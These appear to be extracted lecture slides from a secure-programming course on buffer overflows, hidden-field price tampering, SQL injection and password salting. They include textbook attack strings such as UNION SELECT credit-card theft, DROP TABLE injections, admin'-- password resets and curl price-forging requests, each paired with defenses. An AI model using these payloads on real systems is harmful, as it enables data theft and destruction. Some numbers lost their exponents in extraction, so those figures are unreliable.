“safe_gets” that does check the size of the input, and will accept no more than 16 characters of input. // , and you will attack a program similar to this one in the class exercises. pass[16] main() “Normal” Stack Return Addr. Compromised Stack pass[16] openVault() main()

checkPassword() Bugs Execution stack: maintains current function state and address of return function Stack frame: holds vars and data for function Extra user input (> 16 chars) overwrites return address Attack string: 17-20th chars can specify address of openVault() to bypass check Address can be found with source code or binary

6.1.2. Non-Executable Stacks Don’t Solve It All
Attack could overwrite return address to point to newly injected code NX stacks can prevent this, but not the vault example (jumping to an existing function) Return-into-libc attack: jump to library functions e.g. /bin/sh or cmd.exe to gain access to a command shell (shellcode) and complete control

6.1.3. The safe_gets() Function
#define EOLN '\n' void safe_gets (char *input, int max_chars) { if ((input == NULL) || (max_chars < 1))) return; if (max_chars == 1) { input[0] = 0; return; } int count = 0; char next_char; do { next_char = getchar(); // one character at a time if (next_char != EOLN) input[count++] = next_char; } while ((count < max_chars-1) && // leave space for null (next_char != EOLN)); input[count]=0; } Unlike gets(), takes parameter specifying max chars to insert in buffer Use in checkPassword() instead of gets() to eliminate buffer overflow vulnerability 5 safe_gets(pass, 16);

6.2. Safe String Libraries C – Avoid (no bounds checks): strcpy(), strcat(), sprintf(), scanf() Use safer versions (with bounds checking): strncpy(), strncat(), fgets() Microsoft’s StrSafe, Messier and Viega’s SafeStr do bounds checks, null termination Must pass the right buffer size to functions! C++: STL string class handles allocation Unlike compiled languages (C/C++), interpreted ones (Java/C#) enforce type safety, raise exceptions for buffer overflow At this point, you might be asking yourself how to prevent your programs from being vulnerable to buffer overflows. In the last slide, part of the problem was that the gets() function wrote into the buffer without checking the size of the buffer. As a result, a malicious user is able to use gets() to write addresses into the program’s execution stack. The gets() function assumes that the programmer knows exactly what she is doing and that the programmer is doing a check to make sure that the boundaries of the buffer are not overwritten. Unfortunately, gets() as well as a lot of other C functions assume that these types of checks are already being done, when very often they are not. One solution to make sure that your programs are not vulnerable to buffer overflow attacks is to not use functions like gets(). There are many such C functions that do not check the bounds of the buffers they write. Included in this class of C functions are some very common ones such as string-copy, sting-concatenate, sprintf, scanf, and many others. So, while re-coding your C programs to avoid the use of such functions is one option, doing so may take a lot of work, and it might be hard to do correctly. Later on, we’ll talk about some other approaches to dealing with the issue of buffer overflows. Also, you may be asking about whether or not programs that you write in other languages such as C++ or Java might be vulnerable also. The short answer is that C++ programs are highly susciptle while Java programs are not as vulnerable. We’ll talk about why later on and provide some further tips for how to deal with potential buffer overflows regardless of what programming language you use.

6.3. Additional Approaches
Rewriting old string manipulation code is expensive, any other solutions? StackGuard/canaries (Crispin Cowan) Static checking (e.g. Coverity) Non-executable stacks Interpreted languages (e.g., Java, C#)

6.3.1. StackGuard Canary: random value, unpredictable to attacker
Compiler technique: inserts canary before return address on stack Corrupt Canary: code halts program to thwart a possible attack Not comprehensive protection Source: C. Cowan et. al., StackGuard,

Static Analysis Tools Static Analysis: analyzing programs without running them Meta-level compilation Find security, synchronization, and memory bugs Detect frequent code patterns/idioms and flag code anomalies that don’t fit Ex: Coverity, Fortify, Ounce Labs, Klockwork Coverity found bugs in Linux device drivers

6.4. Performance Mitigating buffer overflow attacks incurs little performance cost Safe str functions take slightly longer to execute StackGuard canary adds small overhead But performance hit is negligible while security payoff is immense

6.5. Heap-Based Overflows Ex: malloc() in C provides a fix chunk of memory on the heap Unless realloc() called, attacker could also overflow heap buffer (fixed size), overwrite adjacent data to modify control path of program Same fixes: bounds-checking on input

6.6. Other Memory Corruption Vulnerabilities
Memory corruption vulnerability: Attacker exploits programmer memory management error Other Examples Format String Vulnerabilities Integer Overflows Used to launch many attacks including buffer overflow Can crash program, take full control

6.6.1. Format String Vulnerabilities
Format String in C directs how text is formatted for output: e.g. %d, %s Can contain info on # chars (e.g. %10s) If message or username greater than 10 or 8 chars, buffer overflows attacker can input a username string to insert shellcode or desired return address void format_warning (char *buffer, char *username, char *message) { sprintf (buffer, "Warning: %10s -- %8s", message, username); }

Integer Overflows (1) Exploits range of value integers can store Ex: signed two-byte int stores between -232 and 232-1 Cause unexpected wrap-around scenarios Attacker passes int greater than max (positive) -> value wraps around to the min (negative!) Can cause unexpected program behavior, possible buffer overflow exploits

Integer Overflows (2) /* Writes str to buffer with offset characters of blank spaces preceding str. */ 3 void formatStr(char *buffer, int buflen, int offset, char *str, int slen) { char message[slen+offset]; int i; 7 /* Write blank spaces */ for (i = 0; i < offset; i++) message[i] = ' '; 11 strncpy(message+offset, str, slen); // offset = 232!? strncpy(buffer, message, buflen); message[buflen-1] = 0; /*Null terminate*/ 15 } Attacker sets offset = 232, wraps around to negative values! write outside bounds of message write arbitrary addresses on heap!

Summary Buffer overflows most common security threat!
Used in many worms such as Morris Worm Affects both stacks and heaps Attacker can run desired code, hijack program Prevent by bounds-checking all buffers And/or use StackGuard, Static Analysis… Type of Memory Corruption: Format String Vulnerabilities, Integer Overflow, etc…

CHAPTER 7 Client-State Manipulation

Agenda Web application – collection of programs used by server to reply to client (browser) requests Often accept user input: don’t trust, validate! HTTP is stateless, servers don’t keep state To conduct transactions, web apps have state State info may be sent to client who echoes it back in future requests Example Exploit: “Hidden” parameters in HTML are not really hidden, can be manipulated Also, validating input at client (i.e., with JavaScript) is ineffective for security

7.1. Pizza Delivery Web Site Example
Web app for delivering pizza Online order form: order.html – say user buys one $5.50 Confirmation form: generated by confirm_order script, asks user to verify purchase, price is sent as hidden form field Fulfillment: submit_order script handles user’s order received as GET request from confirmation form (pay & price variables embedded as parameters in URL)

7.1. Pizza Web Site Code Confirmation Form: Submit Order Script:
<HTML><head><title>Pay for Pizza</title></head> <body><form action="submit_order" method="GET"> <p> The total cost is Are you sure you would like to order? </p> <input type="hidden" name="price" value="5.50"> <input type="submit" name="pay" value="yes"> <input type="submit" name="pay" value="no"> </form></body></HTML> if (pay = yes) { success = authorize_credit_card_charge(price); if (success) { settle_transaction(price); dispatch_delivery_person(); } else { // Could not authorize card tell_user_card_declined(); } } else { display_transaction_cancelled_page(); // no}

Price Stored in Hidden Form Variable
7.1. Buying Pizza Example Web Server Browser (Client) Credit Card Payment Gateway Order 1 Pizza Confirm $5.50 Submit Order $5.50 Attacker will modify Price Stored in Hidden Form Variable submit_order?price=5.50

Attack Scenario (1) Attacker navigates to order form…

Attack Scenario (2) …then to submit order form

Attack Scenario (3) And he can View | Source:

7.1.1. Attack Scenario (4) Changes price in source, reloads page!
Browser sends request: GET /submit_order?price=0.01&pay=yes HTTP/1.1 Hidden form variables are essentially in clear

7.1.1. Attack Scenario (5) Web Browser (Client) Server
Credit Card Payment Gateway Order 1 Pizza Confirm $5.50 Submit Order $0.01 Attacker modified Price!

Attack Scenario (6) Command-line tools to generate HTTP requests curl or Wget automates & speeds up attack: curl ?price=0.01&pay=yes Even against POST, can specify params as arguments to curl or wget command curl -dprice=0.01 -dpay=yes wget --post-data 'price=0.01&pay=yes'

7.1.2. Solution 1: Authoritative State Stays on Server
Server sends session-id to client Server has table mapping session-ids to prices Randomly generated (hard to guess) 128-bit id sent in hidden form field instead of the price. New Request <input type="hidden" name="session-id" value="3927a837e947df203784d309c8372b8e"> GET /submit_order?session-id=3927a837e947df203784d309c8372b8e &pay=yes HTTP/1.1

7.1.2. Solution 1 Changes submit_order script changes:
if (pay = yes) { price = lookup(session-id); // in table if (price != NULL) { // same as before } else { // Cannot find session display_transaction_cancelled_page(); log_client_IP_and_info(); } } else { // same no case

7.1.2. Session Management 128-bit session-id, n = # of session-ids
Limit chance of correct guess to n/2128. Time-out idle session-ids Clear expired session-ids Session-id: hash random # & IP address – harder to attack (also need to spoof IP) Con: server requires DB lookup for each request Performance bottleneck – possible DoS from attackers sending random session-ids Distribute DB, load balance requests

7.1.3. Solution 2: Signed State To Client
Keep Server stateless, attach a signature to state and send to client Can detect tampering through MACs Sign whole transaction (based on all parameters) Security based on secret key known only to server <input type="hidden" name="item-id" value=" "> <input type="hidden" name="qty" value="1"> <input type="hidden" name="address" value="123 Main St, Stanford, CA"> <input type="hidden" name="credit_card_no" value=" "> <input type="hidden" name="exp_date" value="1/2012"> <input type="hidden" name="price" value="5.50"> <input type="hidden" name="signature" value="a2a30984f302c843284e b33d2">

7.1.3. Solution 2 Analysis Changes in submit_order script:
Can detect tampered state vars from invalid signature Performance Hit Compute MACs when processing HTTP requests Stream state info to client -> extra bandwidth if (pay = yes) { // Aggregate transaction state parameters // Note: | is concatenation operator, # a delimiter. state = item-id | # | qty | # | address | # | credit_card_no | # | exp_date | # | price; //Compute message authentication code with server key K. signature_check = MAC(K, state); if (signature == signature_check) { // proceed normally } else { // Invalid signature: cancel & log } } else { // no pay – cancel}

7.2. POST Instead of GET GET: form params (e.g. session-id) leak in URL Could anchor these links in lieu of hidden form fields Alice sends Meg URL in , Meg follows it & continues transaction w/o Alice’s consent Referers can leak through outlinks: This <a href=" link Sends request: Session-id leaked to grocery-store-site’s logs! GET / HTTP/1.1 Referer: session-id=3927a837e947df203784d309c8372b8e

7.2. Benefits of POST POST Request:
POST /submit_order HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 45 session-id%3D3927a837e947df203784d309c8372b8e POST Request: Session-id not visible in URL Pasting into wouldn’t leak it Slightly inconvenient for user, but more secure Referers can still leak w/o user interaction Instead of link, image: <a href= GET request for banner.gif still leaks session-id

7.3. Cookies Cookie - piece of state maintained by client
Server gives cookie to client Client returns cookie to server in HTTP requests Ex: session-id in cookie in lieu of hidden form field Secure dictates using SSL Browser Replies: HTTP/ OK Set-Cookie: session-id=3927a837e947df203784d309c8372b8e; secure GET /submit_order?pay=yes HTTP/1.1 Cookie: session-id=3927a837e947df203784d309c8372b8e

7.3. Problems with Cookies Cookies are associated with browser
Sent back w/ each request, no hidden field to tack on If user doesn’t log out, attacker can use same browser to impersonate user Session-ids should have limited lifetime

7.4. JavaScript (1) Popular client-side scripting language
Ex: Compute prices of an order: <html><head><title>Order Pizza</title></head><body> <form action="submit_order" method="GET" name="f"> How many pizzas would you like to order? <input type="text" name="qty" value="1" onKeyUp="computePrice();"> <input type="hidden" name="price" value="5.50"><br> <input type="submit" name="Order" value="Pay"> <input type="submit" name="Cancel" value="Cancel"> <script> function computePrice() { f.price.value = 5.50 * f.qty.value; // compute new value f.Order.value = "Pay " + f.price.value // update price } </script> </body></html>

7.4. JavaScript (2) Evil user can just delete JavaScript code, substitute desired parameters & submit! Could also just submit request & bypass JavaScript Warning: data validation or computations done by JavaScript cannot be trusted by server Attacker may alter script in HTML code to modify computations Must be redone on server to verify GET /submit_order?qty=1000&price=0&Order=Pay

Summary Web applications need to maintain state
HTTP stateless Hidden form fields, cookies Session-management, server with state… Don’t trust user input! keep state on server (space-expensive) Or sign transaction params (bandwidth-expensive) Use cookies, be wary of cross-site attacks (c.f. ch.10) No JavaScript for computations & validations

CHAPTER 8 SQL Injection Welcome to SEC103 on Secure Programming Techniques. In this course, I assume that you have some background in computer security, but now you want to put that background to use. For example, in the Computer Security Principles and Introduction To Cryptography courses, we cover topics such concerning trust and encryption. In this course, we put these principles into to practice, and I’ll show you have to write secure code that builds security into your applications from the ground up. Slides adapted from "Foundations of Security: What Every Programmer Needs To Know" by Neil Daswani, Christoph Kern, and Anita Kesavan (ISBN ; Except as otherwise noted, the content of this presentation is licensed under the Creative Commons 3.0 License.

Agenda Command injection vulnerability - untrusted input inserted into query or command Attack string alters intended semantics of command Ex: SQL Injection - unsanitized data used in query to back-end database (DB) SQL Injection Examples & Solutions Type 1: compromises user data Type 2: modifies critical data Whitelisting over Blacklisting Escaping Prepared Statements and Bind Variables

SQL Injection Impact in the Real World
CardSystems, credit card payment processing Ruined by SQL Injection attack in June 2005 263,000 credit card #s stolen from its DB #s stored unencrypted, 40 million exposed Awareness Increasing: # of reported SQL injection vulnerabilities tripled from 2004 to 2005

8.1. Attack Scenario (1) Ex: Pizza Site Reviewing Orders
Form requesting month # to view orders for HTTP request:

8.1. Attack Scenario (2) App constructs SQL query from parameter:
Type 1 Attack: inputs month='0 OR 1=1' ! Goes to encoded URL: (space -> %20, = -> %3D) sql_query = "SELECT pizza, toppings, quantity, order_day " + "FROM orders " + "WHERE userid=" + session.getCurrentUserId() + " " + "AND order_month=" + request.getParamenter("month"); SELECT pizza, toppings, quantity, order_day FROM orders WHERE userid=4123 AND order_month=10 Normal SQL Query

8.1. Attack Scenario (3) Malicious Query
SELECT pizza, toppings, quantity, order_day FROM orders WHERE userid=4123 AND order_month=0 OR 1=1 WHERE condition is always true! OR precedes AND Type 1 Attack: Gains access to other users’ private data! All User Data Compromised

8.1. Attack Scenario (4) More damaging attack: attacker sets month=
Attacker is able to Combine 2 queries 1st query: empty table (where fails) 2nd query: credit card #s of all users 0 AND 1=0 UNION SELECT cardholder, number, exp_month, exp_year FROM creditcards

8.1. Attack Scenario (4) Even worse, attacker sets Then DB executes
Type 2 Attack: Removes creditcards from schema! Future orders fail: DoS! Problematic Statements: Modifiers: INSERT INTO admin_users VALUES ('hacker',...) Administrative: shut down DB, control OS… month=0; DROP TABLE creditcards; SELECT pizza, toppings, quantity, order_day FROM orders WHERE userid=4123 AND order_month=0; DROP TABLE creditcards;

8.1. Attack Scenario (5) Injecting String Parameters: Topping Search
Attacker sets: topping=brzfg%'; DROP table creditcards; -- Query evaluates as: SELECT: empty table -- comments out end Credit card info dropped sql_query = "SELECT pizza, toppings, quantity, order_day " + "FROM orders " + "WHERE userid=" + session.getCurrentUserId() + " " + "AND topping LIKE '%" + request.getParamenter("topping") + "%' "; SELECT pizza, toppings, quantity, order_day FROM orders WHERE userid=4123 AND topping LIKE '%brzfg%'; DROP table creditcards; --%'

8.1. Attack Scenario (6) Source:

8.2. Solutions Variety of Techniques: Defense-in-depth
Whitelisting over Blacklisting Input Validation & Escaping Use Prepared Statements & Bind Variables Mitigate Impact

8.2.1. Why Blacklisting Does Not Work
Eliminating quotes enough (blacklist them)? kill_quotes (Java) removes single quotes: sql_query = "SELECT pizza, toppings, quantity, order_day " + "FROM orders " + "WHERE userid=" + session.getCurrentUserId() + " " + "AND topping LIKE 'kill_quotes(request.getParamenter("topping")) + "%'"; String kill_quotes(String str) { StringBuffer result = new StringBuffer(str.length()); for (int i = 0; i < str.length(); i++) { if (str.charAt(i) != '\'') result.append(str.charAt(i)); } return result.toString();

8.2.1. Pitfalls of Blacklisting
Filter quotes, semicolons, whitespace, and…? Could always miss a dangerous character Blacklisting not comprehensive solution Ex: kill_quotes() can’t prevent attacks against numeric parameters May conflict with functional requirements How to store O’Brien in DB if quotes blacklisted?

8.2.2. Whitelisting-Based Input Validation
Whitelisting – only allow input within well-defined set of safe values set implicitly defined through regular expressions RegExp – pattern to match strings against Ex: month parameter: non-negative integer RegExp: ^[0-9]*$ - 0 or more digits, safe subset The ^, $ match beginning and end of string [0-9] matches a digit, * specifies 0 or more

8.2.3. Escaping Could escape quotes instead of blacklisting
Ex: insert user o'connor, password terminator escape(o'connor) = o''connor Like kill_quotes, only works for string inputs Numeric parameters could still be vulnerable sql = "INSERT INTO USERS(uname,passwd) " + "VALUES (" + escape(uname)+ "," + escape(password) +")"; INSERT INTO USERS(uname,passwd) VALUES ('o''connor','terminator');

8.2.4. Second-Order SQL Injection (1)
Second-Order SQL Injection: data stored in database is later used to conduct SQL injection Common if string escaping is applied inconsistently Ex: o'connor updates passwd to SkYn3t Username not escaped, b/c originally escaped before entering DB, now inside our trust zone: Query fails b/c ' after o ends command prematurely new_passwd = request.getParameter("new_passwd"); uname = session.getUsername(); sql = "UPDATE USERS SET passwd='"+ escape(new_passwd) + "' WHERE uname='" + uname + "'"; UPDATE USERS SET passwd='SkYn3t' WHERE uname='o'connor'

8.2.4. Second-Order SQL Injection (2)
Even Worse: What if user set uname=admin'-- !? Attacker changes admin’s password to cracked Has full access to admin account Username avoids collision with real admin -- comments out trailing quote All parameters dangerous: escape(uname) UPDATE USERS SET passwd='cracked' WHERE uname='admin' --'

8.2.5. Prepared Statements & Bind Variables
Metachars (e.g. quotes) provide distinction between data & control in queries most attacks: data interpreted as control alters the semantics of a query Bind Variables: ? placeholders guaranteed to be data (not control) Prepared Statements allow creation of static queries with bind variables Preserves the structure of intended query Parameters not involved in query parsing/compiling

8.2.5. Java Prepared Statements
PreparedStatement ps = db.prepareStatement("SELECT pizza, toppings, quantity, order_day " + "FROM orders WHERE userid=? AND order_month=?"); ps.setInt(1, session.getCurrentUserId()); ps.setInt(2, Integer.parseInt(request.getParamenter("month"))); ResultSet res = ps.executeQuery(); Bind Variable: Data Placeholder Query parsed without parameters Bind variables are typed: input must be of expected type (e.g. int, string)

8.2.5. PHP Prepared Statements
No explicit typing of parameters like in Java Apply consistently: adding $year parameter directly to query still creates SQL injection threat Have separate module for DB access Do prepared statements here Gateway to DB for rest of code $ps = $db->prepare( 'SELECT pizza, toppings, quantity, order_day '. 'FROM orders WHERE userid=? AND order_month=?'); $ps->execute(array($current_user_id, $month));

SQL Stored Procedures Stored procedure: sequence of SQL statements executing on specified inputs Ex: Vulnerable use: Instead use bind variables w/ stored procedure: CREATE PROCEDURE change_password @username VARCHAR(25), @new_passwd VARCHAR(25) AS UPDATE USERS SET passwd=new_passwd WHERE uname=username $db->exec("change_password '"+$uname+"','"+new_passwd+"'"); $ps = $db->prepare("change_password ?, ?"); $ps->execute(array($uname, $new_passwd));

8.2.6. Mitigating the Impact of SQL Injection Attacks
Prevent Schema & Information Leaks Limit Privileges (Defense-in-Depth) Encrypt Sensitive Data stored in Database Harden DB Server and Host O/S Apply Input Validation

8.2.6. Prevent Schema & Information Leaks
Knowing database schema makes attacker’s job easier Blind SQL Injection: attacker attempts to interrogate system to figure out schema Prevent leakages of schema information Don’t display detailed error messages and stack traces to external users

8.2.6. Limiting Privileges Apply Principle of Least Privilege! Limit
Read access, tables/views user can query Commands (are updates/inserts ok?) No more privileges than typical user needs Ex: could prevent attacker from executing INSERT and DROP statements But could still be able do SELECT attacks and compromise user data Not a complete fix, but less damage

8.2.6. Encrypting Sensitive Data
Encrypt data stored in the database second line of defense w/o key, attacker can’t read sensitive info Key management precautions: don’t store key in DB, attacker just SQL injects again to get it Some databases allow automatic encryption, but these still return plaintext queries!

8.2.6. Hardening DB Server and Host O/S
Dangerous functions could be on by default Ex: Microsoft SQL Server Allows users to open inbound/outbound sockets Attacker could steal data, upload binaries, port scan victim’s network Disable unused services and accounts on OS (Ex: No need for web server on DB host)

8.2.6. Applying Input Validation
Validation of query parameters not enough Validate all input early at entry point into code Reject overly long input (could prevent unknown buffer overflow exploit in SQL parser) Redundancy helps protect systems E.g. if programmer forgets to apply validation for query input Two lines of defense

Summary SQL injection attacks are important security threat that can
Compromise sensitive user data Alter or damage critical data Give an attacker unwanted access to DB Key Idea: Use diverse solutions, consistently! Whitelisting input validation & escaping Prepared Statements with bind variables

CHAPTER 9 Password Security

Agenda Password systems ubiquitous, vulnerable
Early password security studies (1979) - Morris, Thompson: 86% of passwords can be cracked Threats: Online & Offline Dictionary Attacks Solutions: Hashing & Salting Password Security: A Case History (1979) , Morris

9.1. A Strawman Proposal Basic password system: file w/ username, password records (colon delimiter) john:automobile mary:balloon joe:wepntkas Simple to implement, but risky All users compromised if hacker gets the passwd file Done in Java: MiniPasswordManager

9.1. MiniPasswordManager public class MiniPasswordManager {
/** dUserMap is a Hashtable keyed by username */ private static Hashtable dUserMap; /** location of the password file on disk */ private static String dPwdFile; public static void add(String username, String password) throws Exception { dUserMap.put(username, password); } public static boolean checkPassword(String username, String password) { try { String t = (String)dUserMap.get(username); return (t == null) ? false : t.equals(password); } catch (Exception e) {} return false; ...

9.1. MPM: File Management public class MiniPasswordManager { ...
/* Password file management operations follow */ public static void init (String pwdFile) throws Exception { dUserMap = MiniPasswordFile.load(pwdFile); dPwdFile = pwdFile; } public static void flush() throws Exception { MiniPasswordFile.store (dPwdFile, dUserMap); ... // main()

9.1. MPM: main() public static void main(String argv[]) {
String pwdFile = null; String userName = null; try { pwdFile = argv[0]; userName = argv[1]; init(pwdFile); System.out.print("Enter new password for " + userName + ": "); BufferedReader br = new BufferedReader (new InputStreamReader(System.in)); String password = br.readLine(); add(userName, password); flush(); } catch (Exception e) { if ((pwdFile != null) && (userName != null)) { System.err.println("Error: Could not read or write " + pwdFile); } else { System.err.println("Usage: java MiniPasswordManager" + " <pwdfile> <username>"); } }

9.1. MPM Analysis Two key functions: username, password args
add() – add entry to dUserMap hashtable checkPassword() – lookup in dUserMap Read/Write dUserMap from/to disk using init()/flush() MiniPasswordFile helper class exposes store() and load() methods for these tasks More to do to make secure…

9.2. Hashing Encrypt passwords, don’t store “in the clear”
Could decrypt (e.g. DES) to check, key storage? Even better: “one-way encryption”, no way to decrypt If file stolen, passwords not compromised Use one-way hash function, h: preimage resistant Ex: SHA-1 hashes stored in file, not plaintext passwd john:9Mfsk4EQh+XD2lBcCAvputrIuVbWKqbxPgKla7u67oo= mary:AEd62KRDHUXW6tp+XazwhTLSUlADWXrinUPbxQEfnsI= joe:J3mhF7Mv4pnfjcnoHZ1ZrUELjSBJFOo1r6D6fx8tfwU=

9.2. Hashing Example Hash: “One-way encryption”
“What is your username & password?” My name is john. My password is automobile. Does h(automobile) = 9Mfsk4EQ… ??? Assume that Joe is a good guy. Hash: “One-way encryption” No need to (can’t) decrypt Just compare hashes Plaintext password not in file, not “in the clear”

9.2. Hashing MPM Modifications
public static void add(String username, String password) throws Exception { dUserMap.put(username,computeSHA(password)); } public static boolean checkPassword(String username, String password) { try { String t = (String)dUserMap.get(username); return (t == null) ? false : t.equals(computeSHA(password)); } catch (Exception e) {} return false; private static String computeSHA (String preimage) throws Exception { MessageDigest md = MessageDigest.getInstance("SHA-256"); md.update(preimage.getBytes("UTF-8")); byte raw[] = md.digest(); return (new sun.misc.BASE64Encoder().encode(raw));

9.3. Off-line Dictionary Attacks
Offline: attacker steals file and tries combos Online: try combos against live system joe 9Mfsk4EQ... mary AEd62KRD... john J3mhF7Mv... Attacker Obtains Password File: Attacker computes possible password hashes (using words from dictionary) But what if Joe is a bad-guy and the password file is readable? mary has password balloon! h(automobile) = 9Mfsk4EQ... h(aardvark) = z5wcuJWE... h(balloon) = AEd62KRD... h(doughnut) = tvj/d6R4 Attacker

9.4. Salting Salting – include additional info in hash
Add third field to file storing random # (salt) Example Entry: john with password automobile Hash of password concatenated with salt: h(automobile|1515) = ScF5GDhW... john:ScF5GDhWeHr2q5m7mSDuGPVasV2NHz4kuu5n5eyuMbo=:1515

9.4. Salting Functions public static int chooseNewSalt() throws NoSuchAlgorithmException { return getSecureRandom((int)Math.pow(2,12)); } /* Returns a cryptographically random number in the range [0,max) */ private static int getSecureRandom(int max) throws NoSuchAlgorithmException { SecureRandom sr = SecureRandom.getInstance("SHA1PRNG"); return Math.abs(sr.nextInt()) % max; public static String getSaltedHash(String pwd, int salt) throws Exception { return computeSHA(pwd + "|" + salt);

9.4. Salting in MPM (1) /* Chooses a salt for the user, computes the salted hash of the user's password, and adds a new entry into the userMap hashtable for the user. */ public static void add(String username, String password) throws Exception { int salt = chooseNewSalt(); HashedPasswordTuple ur = new HashedPasswordTuple(getSaltedHash(password,salt),salt); dUserMap.put(username,ur); } public static boolean checkPassword(String username, String password) { try { HashedPasswordTuple t = (HashedPasswordTuple)dUserMap.get(username); return (t == null) ? false : t.getHashedPassword().equals (getSaltedHash(password,t.getSalt())); } catch (Exception e) {} return false;

9.4. Salting in MPM (2) dUserMap stores HashedPasswordTuple, hashed password and salt To add(), we chooseNewSalt() to getSecureRandom() number in [0, 4096) getSaltedHash() to compute h(passwd|salt) checkPassword() by comparing hash on file w/ salted hash of input password and salt on file

9.4. Salting: Good News Dictionary attack against arbitrary user is harder Before Salts: hash word & compare with password file After Salts: hash combos of word & possible salts n-word dictionary, k-bit salts, v distinct salts: Attacker must hash n*min(v, 2k) strings vs. n (no salt) If many users (>> 2k, all salts used), 2k harder attack! Approx. same amount of work for password system

9.4. Off-line Dictionary Attack Foiled!
h(automobile2975) = KNVXKOHBDEBKOURX h(automobile1487) = ZNBXLPOEWNVDEJOG h(automobile2764) = ZMCXOSJNFKOFJHKDF h(automobile4012) = DJKOINSLOKDKOLJUS h(automobile3912) = CNVIUDONSOUIEPQN …Etc… h(aardvark2975) = DKOUOXKOUDJWOIQ h(aardvark1487) = PODNJUIHDJSHYEJNU But what if Joe is a bad-guy and the password file is readable? (Note that many attacks are committed by insiders.) Too many combinations!!! Attack is Foiled! /etc/passwd: john LPINSFRABXJYWONF 2975 mary DOIIDBQBZIDRWNKG 1487 joe LDHNSUNELDUALKDY 2764

9.4. Salting: Bad News Ineffective against chosen-victim attack
Attacker wants to compromise particular account Just hash dictionary words with victim’s salt Attacker’s job harder, not impossible Easy for attacker to compute 2kn hashes? Then offline dictionary attack still a threat.

9.4. BasicAuthWebServer (BAWS)
Adapt (and rename) SimpleWebServer from Ch. 2 to use MiniPasswordManager Used to implement HTTP authorization Only authenticated clients can access documents from our server First, create a password file: $ java MiniPasswordManager pwdfile hector Warning: Could not load password file. #pwdfile doesn't exist yet Enter new password for hector: lotsadiserts $ java com.learnsecurity.MiniPasswordManager pwdfile dan Enter new password for dan: cryptguru $ cat pwdfile #now it exists (after hector is added) dan:O70FKijze89PDJtQHM8muKC+aXbUJIM/j8T4viT62rM=:3831 hector:laX1pk2KoZy1ze64gUD6rc/pqMuAVmWcKbgdQLL0d7w=:1466

9.4. HTTP Authorization Client makes request: GET /index.html HTTP/1.1
Server requests authentication: Client replies with base-64 encoded username/password combo: Only encoded, not encrypted in basic HTTP auth Eavesdropper can sniff: HTTP digest authorization and/or SSL can help HTTP/ Unauthorized WWW-Authenticate: Basic realm="BasicAuthWebServer" GET /index.html HTTP/1.1 Authorization: Basic aGVjdG9yOmxvdHNhZGlzZXJ0cw==

9.4. BAWS Explanation BAWS = BasicAuthWebServer
During processRequest(), use getAuthorization() to check Credentials object (stores username and password) Then checkPassword() to determine whether to serveFile() main() method modified to accept password filename from command line

9.4. BAWS: processRequest()
public void processRequest(Socket s) throws Exception { //... some code excluded... if (command.equals("GET")) { // handle GET request Credentials c = getAuthorization(br); if ((c != null) && (MiniPasswordManager.checkPassword(c.getUsername(), c.getPassword()))) { serveFile(osw, pathname); } else { osw.write ("HTTP/ Unauthorized"); osw.write ("WWW-Authenticate: Basic"+ "realm=BasicAuthWebServer"); } } else { //... some code excluded ...}

9.4. BAWS: getAuthorization()
private Credentials getAuthorization (BufferedReader br) { try { String header = null; while (!(header = br.readLine()).equals("")) { if (header.startsWith("Authorization:")) { StringTokenizer st = new StringTokenizer(header, " "); st.nextToken(); // skip "Authorization" st.nextToken(); // skip "Basic" return new Credentials(st.nextToken()); } } catch (Exception e) {} return null;

9.4. BAWS: main() public static void main (String argv[]) throws Exception { if (argv.length == 1) {// Initialize MiniPasswordManager MiniPasswordManager.init(argv[0]); /* Create a BasicAuthWebServer object, and run it */ BasicAuthWebServer baws = new BasicAuthWebServer(); baws.run(); } else { System.err.println ("Usage: java BasicAuthWebServer"+ "<pwdfile>"); }

9.5. Online Dictionary Attacks
Attacker actively tries combos on live system Can monitor attacks Watch for lots of failed attempts Mark or block suspicious IPs Avoid server verification: sees password in clear Vulnerable to phishing: impersonator steals password Password-authenticated key exchange (PAKE), zero-knowledge proofs avoid sending password PAKE & zero-knowledge not yet efficient, commercial

9.6. Additional Password Security Techniques
Several other techniques to help securely manage passwords: Mix and match ones that make sense for particular app Strong Passwords “Honeypots” Filtering Aging Pronounceable Limiting Logins Artificial Delays Last Login Image Authentication One-Time Passwords But what if the salt is too small? (It is only 2^12 in Linux/UNIX). The /etc/shadow file is set so that it cannot be read by just anyone. Only root will be able to read and write to the /etc/shadow file. Some programs (like xlock) don't need to be able to change passwords, they only need to be able to verify them. These programs can either be run suid root or you can set up a group shadow that is allowed read only access to the /etc/shadow file. Then the program can be run sgid shadow. By moving the passwords to the /etc/shadow file, we are effectively keeping the attacker from having access to the encoded passwords with which to perform a dictionary attack. Booby-trap: have an unused (guest/guest) password. When someone logs in with it, notify security personnel. (Problem with the number of hackers these days, too many false positives!)

Strong Passwords Not concatenation of 1 or more dictionary words Long as possible: letters, numbers, special chars Can create from long phrases: Ex: “Nothing is really work unless you would rather be doing something else” -> n!rWuUwrbds3 Use 1st letter of each word, transform some chars into visually or phonetically similar ones Protect password file, limit access to admin UNIX used to store in /etc/passwd (readable by all) Now stored in /etc/shadow (req’s privileges/admin)

“Honeypot” Passwords Simple username/password (guest/guest) combos as “honey” to attract attackers Bait attackers into trying simple combos Alert admin when “booby-trap” triggered Could be indication of attack ID the IP and track to see what they’re up to

9.6.3. Password Filtering Let user choose password
Within certain restrictions to guarantee stronger password Ex: if in the dictionary or easy to guess May require mixed case, numbers, special chars Can specify set of secure passwords through regular expressions Also set a particular min length

Aging Passwords Encourage/require users to change passwords every so often Every time user enters password, potential for attacker to eavesdrop Changing frequently makes any compromised password of limited-time use to attacker Could “age” passwords by only accepting it a certain number of times But if require change too often, then users will workaround, more insecure

9.6.5. Pronounceable Passwords
Users want to choose dictionary words because they’re easy to remember Pronounceable Passwords Non-dictionary words, but also easy to recall Syllables & vowels connected together Gpw package generates examples e.g. ahrosios, chireckl, harciefy

9.6.6. Limited Login Attempts
Allow just 3-4 logins, then disable or lock account Attacker only gets fixed number of guesses Inconvenient to users if they’re forgetful Legitimate user would have to ask sys admin to unlock or reset their password Potential for DoS attacks if usernames compromised and attacker guesses randomly for all, locking up large percentage of users of system

9.6.7 Artificial Delays Artificial delay when user tries login over network Wait 2n seconds after nth failure from particular IP address Only minor inconvenience to users (it should only take them a couple of tries, 10 seconds delay at most) But makes attacker’s guesses more costly, decreases number of guesses they can try in fixed time interval HTTP Proxies can be problematic One user mistyping password may delay another user Need more sophisticated way to delay

